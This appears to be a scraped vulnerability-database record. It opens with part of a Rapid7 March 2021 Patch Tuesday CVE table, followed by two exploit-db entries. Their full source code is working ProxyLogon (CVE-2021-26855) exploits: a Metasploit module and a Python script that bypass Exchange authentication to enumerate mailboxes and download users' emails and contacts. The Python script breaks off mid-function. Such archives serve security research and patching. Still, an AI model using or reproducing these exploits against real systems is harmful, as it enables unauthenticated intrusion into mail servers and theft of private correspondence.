Vulnerability | No | No | 7 | No \n[CVE-2021-26890](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26890>) | Application Virtualization Remote Code Execution Vulnerability | No | No | 7.8 | No \n \n## Windows ESU Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27077](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27077>) | Windows Win32k Elevation of Privilege Vulnerability | No | Yes | 7.8 | No \n[CVE-2021-26875](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26875>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26873](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26873>) | Windows User Profile Service Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-26899](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26899>) | Windows UPnP Device Host Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1640](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1640>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-26878](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26878>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26862](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26862>) | Windows Installer Elevation of Privilege Vulnerability | No | No | 6.3 | No \n[CVE-2021-26861](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26861>) | Windows Graphics Component Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-24107](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24107>) | Windows Event Tracing Information Disclosure Vulnerability 
| No | No | 5.5 | Yes \n[CVE-2021-26872](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26872>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26898](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26898>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26901](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26901>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26897](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26897>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-26877](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26877>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-26893](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26893>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-26894](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26894>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-26895](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26895>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-26896](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26896>) | Windows DNS Server Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-27063](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27063>) | Windows DNS Server Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-26869](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26869>) | Windows ActiveX Installer Service 
Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-26882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26882>) | Remote Access API Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26881](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26881>) | Microsoft Windows Media Foundation Remote Code Execution Vulnerability | No | No | 7.5 | No \n[CVE-2021-26887](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26887>) | Microsoft Windows Folder Redirection Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n \n## Summary Graphs\n\n", "cvss3": {}, "published": "2021-03-09T22:13:03", "type": "rapid7blog", "title": "Patch Tuesday - March 2021", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-27844", "CVE-2021-1640", "CVE-2021-1729", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190", "CVE-2021-21300", "CVE-2021-24089", "CVE-2021-24090", "CVE-2021-24095", "CVE-2021-24104", "CVE-2021-24107", "CVE-2021-24108", "CVE-2021-24110", "CVE-2021-26411", "CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-26859", "CVE-2021-26860", "CVE-2021-26861", "CVE-2021-26862", "CVE-2021-26863", "CVE-2021-26864", "CVE-2021-26865", "CVE-2021-26866", "CVE-2021-26867", "CVE-2021-26868", "CVE-2021-26869", "CVE-2021-26870", "CVE-2021-26871", "CVE-2021-26872", "CVE-2021-26873", "CVE-2021-26874", 
"CVE-2021-26875", "CVE-2021-26876", "CVE-2021-26877", "CVE-2021-26878", "CVE-2021-26879", "CVE-2021-26880", "CVE-2021-26881", "CVE-2021-26882", "CVE-2021-26884", "CVE-2021-26885", "CVE-2021-26886", "CVE-2021-26887", "CVE-2021-26889", "CVE-2021-26890", "CVE-2021-26891", "CVE-2021-26892", "CVE-2021-26893", "CVE-2021-26894", "CVE-2021-26895", "CVE-2021-26896", "CVE-2021-26897", "CVE-2021-26898", "CVE-2021-26899", "CVE-2021-26900", "CVE-2021-26901", "CVE-2021-26902", "CVE-2021-27047", "CVE-2021-27048", "CVE-2021-27049", "CVE-2021-27050", "CVE-2021-27051", "CVE-2021-27052", "CVE-2021-27053", "CVE-2021-27054", "CVE-2021-27055", "CVE-2021-27056", "CVE-2021-27057", "CVE-2021-27058", "CVE-2021-27059", "CVE-2021-27060", "CVE-2021-27061", "CVE-2021-27062", "CVE-2021-27063", "CVE-2021-27065", "CVE-2021-27066", "CVE-2021-27070", "CVE-2021-27074", "CVE-2021-27075", "CVE-2021-27076", "CVE-2021-27077", "CVE-2021-27078", "CVE-2021-27080", "CVE-2021-27081", "CVE-2021-27082", "CVE-2021-27083", "CVE-2021-27084", "CVE-2021-27085"], "modified": "2021-03-09T22:13:03", "id": "RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53", "href": "https://blog.rapid7.com/2021/03/09/patch-tuesday-march-2021/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2022-08-16T06:04:56", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-21T00:00:00", "type": "exploitdb", "title": "Microsoft Exchange 2019 - Unauthenticated Email Download (Metasploit)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": 
false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-26855", "CVE-2021-26855", "CVE-2021-27065"], "modified": "2021-05-21T00:00:00", "id": "EDB-ID:49895", "href": "https://www.exploit-db.com/exploits/49895", "sourceData": "# Exploit Title: Microsoft Exchange 2019 - Unauthenticated Email Download (Metasploit)\r\n# Date: 2021-03-02\r\n# Exploit Author: RAMELLA S\u00e9bastien\r\n# Vendor Homepage: https://microsoft.com\r\n# Version: This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012,\r\n Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009,\r\n Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010).\r\n# Tested on: Microsoft Windows 2012 R2 - Exchange 2016\r\n\r\n##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\n# begin auxiliary class\r\nclass MetasploitModule < Msf::Auxiliary\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'Microsoft Exchange ProxyLogon Collector',\r\n 'Description' => %q{\r\n This module scan for a vulnerability on Microsoft Exchange Server that\r\n allows an attacker bypassing the authentication and impersonating as the\r\n admin (CVE-2021-26855).\r\n\r\n By chaining this bug with another post-auth arbitrary-file-write\r\n vulnerability to get code execution (CVE-2021-27065).\r\n\r\n As a result, an unauthenticated attacker can execute arbitrary commands on\r\n Microsoft Exchange Server.\r\n\r\n This vulnerability affects (Exchange 
2013 Versions < 15.00.1497.012,\r\n Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009,\r\n Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010).\r\n\r\n All components are vulnerable by default.\r\n },\r\n 'Author' => [\r\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Module author (Zeop Entreprise)\r\n ],\r\n 'References' => [\r\n ['CVE', '2021-26855'],\r\n ['LOGO', 'https://proxylogon.com/images/logo.jpg'],\r\n ['URL', 'https://proxylogon.com/'],\r\n ['URL', 'https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse'],\r\n ['URL', 'http://aka.ms/exchangevulns']\r\n ],\r\n 'DisclosureDate' => '2021-03-02',\r\n 'License' => MSF_LICENSE,\r\n 'DefaultOptions' => {\r\n 'RPORT' => 443,\r\n 'SSL' => true\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['ProxyLogon']\r\n }\r\n )\r\n )\r\n\r\n register_options([\r\n OptString.new('EMAIL', [true, 'The email account what you want dump']),\r\n OptString.new('FOLDER', [true, 'The email folder what you want dump', 'inbox']),\r\n OptString.new('SERVER_NAME', [true, 'The name of secondary internal Exchange server targeted'])\r\n ])\r\n\r\n register_advanced_options([\r\n OptInt.new('MaxEntries', [false, 'Override the maximum number of object to dump', 512])\r\n ])\r\n end\r\n\r\n XMLNS = { 't' => 'http://schemas.microsoft.com/exchange/services/2006/types' }.freeze\r\n\r\n def grab_contacts\r\n response = send_xml(soap_findcontacts)\r\n xml = Nokogiri::XML.parse(response.body)\r\n\r\n data = xml.xpath('//t:Contact', XMLNS)\r\n if data.empty?\r\n print_status(' - the user has no contacts')\r\n else\r\n write_loot(data.to_s)\r\n end\r\n end\r\n\r\n def grab_emails(total_count)\r\n # get the emails list of the target folder.\r\n response = send_xml(soap_maillist(total_count))\r\n xml = Nokogiri::XML.parse(response.body)\r\n\r\n # iteration to download the emails.\r\n xml.xpath('//t:ItemId', XMLNS).each do |item|\r\n print_status(\" - download item: 
#{item.values[1]}\")\r\n response = send_xml(soap_download(item.values[0], item.values[1]))\r\n xml = Nokogiri::XML.parse(response.body)\r\n\r\n message = xml.at_xpath('//t:MimeContent', XMLNS).content\r\n write_loot(Rex::Text.decode_base64(message))\r\n end\r\n end\r\n\r\n def send_xml(data)\r\n uri = normalize_uri('ecp', 'temp.js')\r\n\r\n received = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => uri,\r\n 'cookie' => \"X-BEResource=#{datastore['SERVER_NAME']}/EWS/Exchange.asmx?a=~3;\",\r\n 'ctype' => 'text/xml; charset=utf-8',\r\n 'data' => data\r\n )\r\n fail_with(Failure::Unknown, 'Server did not respond in an expected way') unless received\r\n\r\n received\r\n end\r\n\r\n def soap_download(id, change_key)\r\n <<~SOAP\r\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\r\n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\"\r\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\"\r\n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soap:Body>\r\n <m:GetItem>\r\n <m:ItemShape>\r\n <t:BaseShape>IdOnly</t:BaseShape>\r\n <t:IncludeMimeContent>true</t:IncludeMimeContent>\r\n </m:ItemShape>\r\n <m:ItemIds>\r\n <t:ItemId Id=\"#{id}\" ChangeKey=\"#{change_key}\" />\r\n </m:ItemIds>\r\n </m:GetItem>\r\n </soap:Body>\r\n </soap:Envelope>\r\n SOAP\r\n end\r\n\r\n def soap_findcontacts\r\n <<~SOAP\r\n <?xml version='1.0' encoding='utf-8'?>\r\n <soap:Envelope\r\n xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\r\n xmlns:t='http://schemas.microsoft.com/exchange/services/2006/types'\r\n xmlns:m='http://schemas.microsoft.com/exchange/services/2006/messages'\r\n xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'>\r\n <soap:Body>\r\n <m:FindItem Traversal='Shallow'>\r\n <m:ItemShape>\r\n <t:BaseShape>AllProperties</t:BaseShape>\r\n </m:ItemShape>\r\n <m:IndexedPageItemView MaxEntriesReturned=\"#{datastore['MaxEntries']}\" Offset=\"0\" 
BasePoint=\"Beginning\" />\r\n <m:ParentFolderIds>\r\n <t:DistinguishedFolderId Id='contacts'>\r\n <t:Mailbox>\r\n <t:EmailAddress>#{datastore['EMAIL']}</t:EmailAddress>\r\n </t:Mailbox>\r\n </t:DistinguishedFolderId>\r\n </m:ParentFolderIds>\r\n </m:FindItem>\r\n </soap:Body>\r\n </soap:Envelope>\r\n SOAP\r\n end\r\n\r\n def soap_mailnum\r\n <<~SOAP\r\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\r\n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\"\r\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\"\r\n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soap:Body>\r\n <m:GetFolder>\r\n <m:FolderShape>\r\n <t:BaseShape>Default</t:BaseShape>\r\n </m:FolderShape>\r\n <m:FolderIds>\r\n <t:DistinguishedFolderId Id=\"#{datastore['FOLDER']}\">\r\n <t:Mailbox>\r\n <t:EmailAddress>#{datastore['EMAIL']}</t:EmailAddress>\r\n </t:Mailbox>\r\n </t:DistinguishedFolderId>\r\n </m:FolderIds>\r\n </m:GetFolder>\r\n </soap:Body>\r\n </soap:Envelope>\r\n SOAP\r\n end\r\n\r\n def soap_maillist(max_entries)\r\n <<~SOAP\r\n <?xml version='1.0' encoding='utf-8'?>\r\n <soap:Envelope\r\n xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\r\n xmlns:t='http://schemas.microsoft.com/exchange/services/2006/types'\r\n xmlns:m='http://schemas.microsoft.com/exchange/services/2006/messages'\r\n xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'>\r\n <soap:Body>\r\n <m:FindItem Traversal='Shallow'>\r\n <m:ItemShape>\r\n <t:BaseShape>AllProperties</t:BaseShape>\r\n </m:ItemShape>\r\n <m:IndexedPageItemView MaxEntriesReturned=\"#{max_entries}\" Offset=\"0\" BasePoint=\"Beginning\" />\r\n <m:ParentFolderIds>\r\n <t:DistinguishedFolderId Id='#{datastore['FOLDER']}'>\r\n <t:Mailbox>\r\n <t:EmailAddress>#{datastore['EMAIL']}</t:EmailAddress>\r\n </t:Mailbox>\r\n </t:DistinguishedFolderId>\r\n </m:ParentFolderIds>\r\n </m:FindItem>\r\n </soap:Body>\r\n 
</soap:Envelope>\r\n SOAP\r\n end\r\n\r\n def write_loot(data)\r\n loot_path = store_loot('', 'text/plain', datastore['RHOSTS'], data, '', '')\r\n print_good(\" - file saved to #{loot_path}\")\r\n end\r\n\r\n def run\r\n # get the informations about the targeted user account.\r\n response = send_xml(soap_mailnum)\r\n if response.body =~ /Success/\r\n print_status('Connection to the server is successful')\r\n print_status(\" - selected account: #{datastore['EMAIL']}\\n\")\r\n\r\n # grab contacts.\r\n print_status('Attempt to dump contacts list for this user')\r\n grab_contacts\r\n\r\n print_line\r\n\r\n # grab emails.\r\n print_status('Attempt to dump emails for this user')\r\n xml = Nokogiri::XML.parse(response.body)\r\n folder_id = xml.at_xpath('//t:FolderId', XMLNS).values\r\n print_status(\" - selected folder: #{datastore['FOLDER']} (#{folder_id[0]})\")\r\n\r\n total_count = xml.at_xpath('//t:TotalCount', XMLNS).content\r\n print_status(\" - number of email found: #{total_count}\")\r\n\r\n if total_count.to_i > datastore['MaxEntries']\r\n print_warning(\" - number of email recaluled due to max entries: #{datastore['MaxEntries']}\")\r\n total_count = datastore['MaxEntries'].to_s\r\n end\r\n grab_emails(total_count)\r\n end\r\n end\r\n\r\nend", "sourceHref": "https://www.exploit-db.com/download/49895", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-16T06:04:57", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-18T00:00:00", "type": "exploitdb", "title": "Microsoft Exchange 2019 - Unauthenticated Email Download", 
"bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-26855", "CVE-2021-26855"], "modified": "2021-05-18T00:00:00", "id": "EDB-ID:49879", "href": "https://www.exploit-db.com/exploits/49879", "sourceData": "# Exploit Title: Microsoft Exchange 2019 - Unauthenticated Email Download\r\n# Date: 03-11-2021\r\n# Exploit Author: Gonzalo Villegas a.k.a Cl34r\r\n# Vendor Homepage: https://www.microsoft.com/\r\n# Version: OWA Exchange 2013 - 2019\r\n# Tested on: OWA 2016\r\n# CVE : CVE-2021-26855\r\n# Details: checking users mailboxes and automated downloads of emails\r\n\r\nimport requests\r\nimport argparse\r\nimport time\r\n\r\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\r\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\r\n\r\n__proxies__ = {\"http\": \"http://127.0.0.1:8080\",\r\n \"https\": \"https://127.0.0.1:8080\"} # for debug on proxy\r\n\r\n\r\n# needs to specifies mailbox, will return folder Id if account exists\r\npayload_get_folder_id = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \r\n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \r\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" \r\n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soap:Body>\r\n <m:GetFolder>\r\n <m:FolderShape>\r\n <t:BaseShape>AllProperties</t:BaseShape>\r\n </m:FolderShape>\r\n <m:FolderIds>\r\n <t:DistinguishedFolderId 
Id=\"inbox\">\r\n <t:Mailbox>\r\n <t:EmailAddress>{}</t:EmailAddress>\r\n </t:Mailbox>\r\n </t:DistinguishedFolderId>\r\n </m:FolderIds>\r\n </m:GetFolder>\r\n </soap:Body>\r\n </soap:Envelope>\r\n\r\n\"\"\"\r\n# needs to specifies Folder Id and ChangeKey, will return a list of messages Ids (emails)\r\npayload_get_items_id_folder = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \r\n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \r\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" \r\n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soap:Body>\r\n <m:FindItem Traversal=\"Shallow\">\r\n <m:ItemShape>\r\n <BaseShape>AllProperties</BaseShape></m:ItemShape>\r\n <SortOrder/>\r\n <m:ParentFolderIds>\r\n <t:FolderId Id=\"{}\" ChangeKey=\"{}\"/>\r\n </m:ParentFolderIds>\r\n <QueryString/>\r\n </m:FindItem>\r\n </soap:Body>\r\n</soap:Envelope>\r\n\"\"\"\r\n\r\n# needs to specifies Id (message Id) and ChangeKey (of message too), will return an email from mailbox\r\npayload_get_mail = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \r\n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \r\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" \r\n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soap:Body>\r\n <GetItem xmlns=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \r\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" Traversal=\"Shallow\">\r\n <ItemShape>\r\n <t:BaseShape>Default</t:BaseShape>\r\n </ItemShape>\r\n <ItemIds>\r\n <t:ItemId Id=\"{}\" ChangeKey=\"{}\"/>\r\n </ItemIds>\r\n </GetItem>\r\n </soap:Body>\r\n </soap:Envelope>\r\n\"\"\"\r\n\r\n\r\ndef getFQDN(url):\r\n print(\"[*] Getting FQDN from headers\")\r\n rs = requests.post(url + \"/owa/auth.owa\", 
verify=False, data=\"evildata\")\r\n if \"X-FEServer\" in rs.headers:\r\n return rs.headers[\"X-FEServer\"]\r\n else:\r\n print(\"[-] Can't get FQDN \")\r\n exit(0)\r\n\r\n\r\ndef extractEmail(url, uri, user, fqdn, content_folderid, path):\r\n headers = {\"Cookie\": \"X-BEResource={}/EWS/Exchange.asmx?a=~1942062522\".format(fqdn),\r\n \"Content-Type\": \"text/xml\",\r\n \"User-Agent\": \"Mozilla pwner\"}\r\n from xml.etree import ElementTree as ET\r\n dom = ET.fromstring(content_folderid)\r\n for p in dom.findall('.//{http://schemas.microsoft.com/exchange/services/2006/types}Folder'):\r\n id_folder = p[0].attrib.get(\"Id\")\r\n change_key_folder = p[0].attrib.get(\"ChangeKey\")\r\n data = payload_get_items_id_folder.format(id_folder, change_key_folder)\r\n random_uris = [\"auth.js\", \"favicon.ico\", \"ssq.js\", \"ey37sj.js\"]\r\n rs = requests.post(url + uri, data=data, headers=headers, verify=False)\r\n if \"ErrorAccessDenied\" in rs.text:\r\n print(\"[*] Denied ;(.. retrying\")\r\n t_uri = uri.split(\"/\")[-1]\r\n for ru in random_uris:\r\n print(\"[*] Retrying with {}\".format(uri.replace(t_uri, ru)))\r\n rs = requests.post(url + uri.replace(t_uri, ru), data=data, headers=headers, verify=False)\r\n if \"NoError\" in rs.text:\r\n print(\"[+] data found, dowloading email\")\r\n break\r\n print(\"[+]Getting mails...\")\r\n dom_messages = ET.fromstring(rs.text)\r\n messages = dom_messages.find('.//{http://schemas.microsoft.com/exchange/services/2006/types}Items')\r\n for m in messages:\r\n id_message = m[0].attrib.get(\"Id\")\r\n change_key_message = m[0].attrib.get(\"ChangeKey\")\r\n data = payload_get_mail.format(id_message, change_key_message)\r\n random_uris = [\"auth.js\", \"favicon.ico\", \"ssq.js\", \"ey37sj.js\"]\r\n rs = requests.post(url + uri, data=data, headers=headers, verify=False)\r\n if \"ErrorAccessDenied\" in rs.text:\r\n print(\"[*] Denied ;(.. 
retrying\")\r\n t_uri = uri.split(\"/\")[-1]\r\n for ru in random_uris:\r\n print(\"[*] Retrying with {}\".format(uri.replace(t_uri, ru)))\r\n rs = requests.post(url + uri.replace(t_uri, ru), data=data, headers=headers, verify=False)\r\n if \"NoError\" in rs.text:\r\n print(\"[+] data found, downloading email\")\r\n break\r\n\r\n try:\r\n f = open(path + \"/\" + user.replace(\"@\", \"_\").replace(\".\", \"_\")+\"_\"+change_key_message.replace(\"/\", \"\").replace(\"\\\\\", \"\")+\".xml\", 'w+')\r\n f.write(rs.text)\r\n f.close()\r\n except Exception as e:\r\n print(\"[!] Can't write .xml file to path (email): \", e)\r\n\r\n\r\ndef checkURI(url, fqdn):\r\n headers = {\"Cookie\": \"X-BEResource={}/EWS/Exchange.asmx?a=~1942062522\".format(fqdn),\r\n \"Content-Type\": \"text/xml\",\r\n \"User-Agent\": \"Mozilla hehe\"}\r\n arr_uri = [\"//ecp/xxx.js\", \"/ecp/favicon.ico\", \"/ecp/auth.js\"]\r\n for uri in arr_uri:\r\n rs = requests.post(url + uri, verify=False, data=payload_get_folder_id.format(\"thisisnotanvalidmail@pwn.local\"),\r\n headers=headers)\r\n #print(rs.content)\r\n if rs.status_code == 200 and \"MessageText\" in rs.text:\r\n print(\"[+] Valid URI:\", uri)\r\n calculated_domain = rs.headers[\"X-CalculatedBETarget\"].split(\".\")\r\n if calculated_domain[-2] in (\"com\", \"gov\", \"gob\", \"edu\", \"org\"):\r\n calculated_domain = calculated_domain[-3] + \".\" + calculated_domain[-2] + \".\" + calculated_domain[-1]\r\n else:\r\n calculated_domain = calculated_domain[-2] + \".\" + calculated_domain[-1]\r\n return uri, calculated_domain\r\n #time.sleep(1)\r\n print(\"[-] No valid URI found ;(\")\r\n exit(0)\r\n\r\n\r\ndef checkEmailBoxes(url, uri, user, fqdn, path):\r\n headers = {\"Cookie\": \"X-BEResource={}/EWS/Exchange.asmx?a=~1942062522\".format(fqdn),\r\n \"Content-Type\": \"text/xml\",\r\n \"User-Agent\": \"Mozilla hehe\"}\r\n rs = requests.post(url + uri, verify=False, data=payload_get_folder_id.format(user),\r\n headers=headers)\r\n #time.sleep(1)\r\n 
#print(rs.content)\r\n if \"ResponseCode\" in rs.text and \"ErrorAccessDenied\" in rs.text:\r\n print(\"[*] Valid Email: {} ...but not authenticated ;( maybe not vulnerable\".format(user))\r\n if \"ResponseCode\" in rs.text and \"NoError\" in rs.text:\r\n print(\"[+] Valid Email Found!: {}\".format(user))\r\n extractEmail(url, uri, user, fqdn, rs.text, path)\r\n if \"ResponseCode\" in rs.text and \"ErrorNonExistentMailbox\" in rs.text:\r\n print(\"[-] Not Valid Email: {}\".format(user))\r\n\r\n\r\ndef main():\r\n __URL__ = None\r\n __FQDN__ = None\r\n __mailbox_domain__ = None\r\n __path__ = None\r\n print(\"[***** OhhWAA *****]\")\r\n parser = argparse.ArgumentParser(usage=\"Basic usage python %(prog)s -u <url> -l <users.txt> -p <path>\")\r\n parser.add_argument('-u', \"--url\", help=\"Url, provide schema and not final / (eg https://example.org)\", required=True)\r\n parser.add_argument('-l', \"--list\", help=\"Users mailbox list\", required=True)\r\n parser.add_argument(\"-p\", \"--path\", help=\"Path to write emails in xml format\", required=True)\r\n parser.add_argument('-f', \"--fqdn\", help=\"FQDN\", required=False, default=None)\r\n parser.add_argument(\"-d\", \"--domain\", help=\"Domain to check mailboxes (eg if .local dont work)\", required=False, default=None)\r\n args = parser.parse_args()\r\n __URL__ = args.url\r\n __FQDN__ = args.fqdn\r\n __mailbox_domain__ = args.domain\r\n __list_users__ = args.list\r\n __valid_users__ = []\r\n __path__ = args.path\r\n if not __FQDN__:\r\n __FQDN__ = getFQDN(__URL__)\r\n print(\"[+] Got FQDN:\", __FQDN__)\r\n\r\n valid_uri, calculated_domain = checkURI(__URL__, __FQDN__)\r\n\r\n if not __mailbox_domain__:\r\n __mailbox_domain__ = calculated_domain\r\n\r\n list_users = open(__list_users__, 